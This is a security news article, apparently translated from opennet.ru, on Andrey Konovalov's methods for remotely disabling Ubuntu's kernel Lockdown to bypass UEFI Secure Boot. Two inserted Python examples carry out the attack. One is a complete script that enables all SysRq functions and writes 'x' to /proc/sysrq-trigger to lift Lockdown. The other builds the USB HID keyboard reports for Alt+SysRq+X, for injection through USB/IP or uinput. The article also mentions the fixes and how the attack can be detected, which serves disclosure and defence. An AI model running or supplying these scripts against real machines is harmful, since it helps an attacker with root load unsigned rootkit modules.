Methods to Disable Lockdown Security in Ubuntu to Bypass UEFI Secure Boot Remotely

Andrey Konovalov from Google has published ways to remotely disable the Lockdown protection shipped in the Linux kernel package supplied with Ubuntu (in theory the proposed methods should also work with the Fedora kernel and those of other distributions, but this has not been tested).

Lockdown restricts root's access to the kernel and closes the paths that could be used to bypass UEFI Secure Boot. For example, lockdown mode restricts access to /dev/mem, /dev/kmem, /dev/port, /proc/kcore, debugfs, kprobes, mmiotrace, tracefs, BPF, PCMCIA CIS (Card Information Structure), some ACPI interfaces and CPU MSR registers; blocks the kexec_file and kexec_load calls; prohibits hibernation (suspend to disk); limits the use of DMA by PCI devices; prohibits importing ACPI code from EFI variables; and does not allow manipulation of I/O ports, including changing the interrupt number and I/O port of the serial port.

The Lockdown mechanism was recently merged into the mainline Linux kernel in 5.4, but distributions still ship it as out-of-tree patches or supplement the mainline code with their own patches. One difference between the distribution add-ons and the mainline implementation is the ability to disable Lockdown when there is physical access to the system.

In Ubuntu and Fedora, the key combination Alt+SysRq+X is provided to disable Lockdown. The assumption is that Alt+SysRq+X can only be pressed with physical access to the device, so an attacker who has compromised the machine remotely and obtained root will not be able to disable Lockdown and, for example, load an unsigned module carrying a rootkit into the kernel.

Andrey Konovalov showed that keyboard-based methods of confirming the user's physical presence are ineffective. The simplest way to disable Lockdown programmatically would be to simulate pressing Alt+SysRq+X via /dev/uinput, but that option is disabled by default. However, he identified at least two more ways to substitute for Alt+SysRq+X.

The first method uses the sysrq-trigger interface: to simulate the key press it is enough to enable the interface by writing "1" to /proc/sys/kernel/sysrq and then writing "x" to /proc/sysrq-trigger. This loophole was closed in the December update of the Ubuntu kernel and in Fedora 31. Notably, the developers, as in the case of /dev/uinput, had originally tried to block this method, but the blocking did not work because of a bug in the code.
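The sysrq-trigger method above, written out as a script that records the Lockdown state before and after, as an added example (this is not Konovalov's tool and not code from the original article). It assumes the mainline securityfs file /sys/kernel/security/lockdown is present (kernels 5.4+; older distribution patch sets may not expose it, in which case the state is reported as unknown), that the script runs as root, and that the kernel still has the unfixed sysrq path. The value 1 in /proc/sys/kernel/sysrq is the "enable everything" setting, as opposed to a bitmask of allowed function groups, which is why the method writes exactly that value.

```python
"""Lockdown bypass, method 1: lift Lockdown through /proc/sysrq-trigger.

Added example, not Konovalov's tool and not code from the article.
Assumptions: /sys/kernel/security/lockdown exists (mainline 5.4+), we run as
root, and the kernel still accepts the 'x' SysRq key from /proc/sysrq-trigger.
"""
import sys

# Assumed paths: the mainline securityfs state file and the two standard
# sysrq interfaces named in the article.
LOCKDOWN_STATE = "/sys/kernel/security/lockdown"
SYSRQ_MASK = "/proc/sys/kernel/sysrq"
SYSRQ_TRIGGER = "/proc/sysrq-trigger"


def parse_lockdown(text):
    """Return the active mode from a securityfs lockdown line.

    The file reads e.g. "none [integrity] confidentiality"; the bracketed
    word is the mode currently in force.
    """
    for word in text.split():
        if word.startswith("[") and word.endswith("]"):
            return word[1:-1]
    return None


def read_lockdown(path=LOCKDOWN_STATE):
    """Active Lockdown mode, or None if the kernel does not expose the file."""
    try:
        with open(path) as f:
            return parse_lockdown(f.read())
    except OSError:
        return None


def sysrq_enables_all(value):
    """True if /proc/sys/kernel/sysrq is 1, i.e. every SysRq function is on.

    0 disables SysRq entirely; any other value is a bitmask of allowed
    function groups. The article's method writes 1, which makes every key
    accepted regardless of the individual handler's enable mask.
    """
    return int(value) == 1


def trigger_sysrq(key, mask_path=SYSRQ_MASK, trigger_path=SYSRQ_TRIGGER):
    """Enable all SysRq functions, then fire the given key.

    Returns (old_mask, key). The paths are parameters so the write logic can
    be exercised against temporary files without touching /proc.
    """
    with open(mask_path) as f:
        old_mask = f.read().strip()
    with open(mask_path, "w") as f:
        f.write("1\n")
    with open(trigger_path, "w") as f:
        f.write(key + "\n")  # the sysrq-trigger handler reads the first byte
    return old_mask, key


def main():
    before = read_lockdown()
    print("lockdown before:", before or "unknown (no securityfs file)")
    try:
        old_mask, _ = trigger_sysrq("x")
    except PermissionError:
        sys.exit("root is required to write the sysrq interfaces")
    print("sysrq mask was", old_mask, "(now 1: all functions enabled)")
    after = read_lockdown()
    print("lockdown after:", after or "unknown")
    # On the unfixed kernel the mode changes to "none"; on a fixed kernel the
    # 'x' key is refused from /proc and the state is unchanged.
    return 0 if after == "none" else 1


if __name__ == "__main__":
    sys.exit(main())
```

Run it twice, once before and once after applying the December kernel update, and compare the "lockdown after" line: the same script then doubles as a regression check that the fix actually refuses 'x' from /proc/sysrq-trigger.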

The second method is keyboard emulation through USB/IP, followed by sending the Alt+SysRq+X sequence from the virtual keyboard. USB/IP support is enabled by default in the kernel shipped with Ubuntu (CONFIG_USBIP_VHCI_HCD=m and CONFIG_USBIP_CORE=m), which provides the digitally signed usbip_core and vhci_hcd modules needed for this to work. The attacker can create a virtual USB device by running a network handler on the loopback interface and attaching it as a remote USB device via USB/IP. The Ubuntu developers have been informed of this method, but no fix has been released yet.
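What the virtual keyboard has to deliver, as an added example (not code from the article or from Konovalov's tool): the USB HID boot-protocol keyboard reports a USB/IP-attached keyboard returns on its interrupt IN endpoint for Alt+SysRq+X, and the evdev key events those reports become once usbhid and hid-input have decoded them. It covers both the uinput route mentioned earlier (which injects the evdev events directly) and the USB/IP route (which injects the HID reports). The USB/IP transport itself, i.e. the device list, import handshake and URB framing, is not implemented here. Usage IDs are from the HID Usage Tables keyboard page, keycodes from linux/input-event-codes.h, and the usage-to-keycode mapping is the one hid-input applies.

```python
"""Alt+SysRq+X as a USB HID keyboard sends it and as the input core sees it.

Added example, not code from the article. The kernel treats a USB/IP-attached
device as an ordinary USB keyboard, so these reports reach the sysrq handler
exactly like a physical key press would.
"""
import struct

# HID Usage Tables, Keyboard/Keypad page (0x07). PrintScreen is the usage
# Linux maps to KEY_SYSRQ; Left Alt is bit 2 of the modifier byte.
USAGE_X = 0x1B
USAGE_PRINTSCREEN = 0x46
MOD_LEFT_ALT = 0x04

# Linux input event codes (linux/input-event-codes.h).
KEY_LEFTALT = 56
KEY_SYSRQ = 99
KEY_X = 45

# hid-input's mapping for the usages used in this sequence.
USAGE_TO_KEYCODE = {USAGE_PRINTSCREEN: KEY_SYSRQ, USAGE_X: KEY_X}
MODIFIER_TO_KEYCODE = {MOD_LEFT_ALT: KEY_LEFTALT}


def hid_report(modifiers, keys=()):
    """8-byte boot-protocol keyboard report: modifier bitmask, one reserved
    byte, then up to six concurrently pressed non-modifier usage IDs."""
    if len(keys) > 6:
        raise ValueError("boot protocol carries at most six keys per report")
    if modifiers > 0xFF or any(k > 0xFF for k in keys):
        raise ValueError("modifier bitmask and usage IDs are single bytes")
    padding = [0] * (6 - len(keys))
    return struct.pack("<BB6B", modifiers, 0, *keys, *padding)


def alt_sysrq_x_reports():
    """Reports for Alt+SysRq+X: hold Alt, add PrintScreen (SysRq), add X,
    then release everything.

    Each report carries the complete current key state. The kernel's sysrq
    filter needs Alt to be down when KEY_SYSRQ arrives, and then takes the
    next key press (here 'x') as the SysRq command.
    """
    return [
        hid_report(MOD_LEFT_ALT),
        hid_report(MOD_LEFT_ALT, [USAGE_PRINTSCREEN]),
        hid_report(MOD_LEFT_ALT, [USAGE_PRINTSCREEN, USAGE_X]),
        hid_report(0),
    ]


def decode_report(report):
    """Linux keycodes currently pressed according to one report."""
    modifiers, _reserved, *keys = struct.unpack("<BB6B", report)
    pressed = [code for bit, code in MODIFIER_TO_KEYCODE.items() if modifiers & bit]
    pressed += [USAGE_TO_KEYCODE[usage] for usage in keys if usage]
    return pressed


def reports_to_events(reports):
    """Diff consecutive reports into (keycode, value) evdev key events,
    value 1 for press and 0 for release, as the HID layer feeds them to the
    input core (and as a uinput device would have to inject them)."""
    events, down = [], set()
    for report in reports:
        now = set(decode_report(report))
        events += [(code, 1) for code in sorted(now - down)]
        events += [(code, 0) for code in sorted(down - now)]
        down = now
    return events


if __name__ == "__main__":
    for report in alt_sysrq_x_reports():
        print(report.hex(), decode_report(report))
    print(reports_to_events(alt_sysrq_x_reports()))
```

The third report, `04 00 46 1b 00 00 00 00`, is the one that matters: Left Alt in the modifier byte, PrintScreen and X in the key array. A detection-minded reader can use the same decoding in reverse, since a KEY_SYSRQ press arriving from a newly attached vhci_hcd device while Alt is held is the observable trace of this method.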

Source: opennet.ru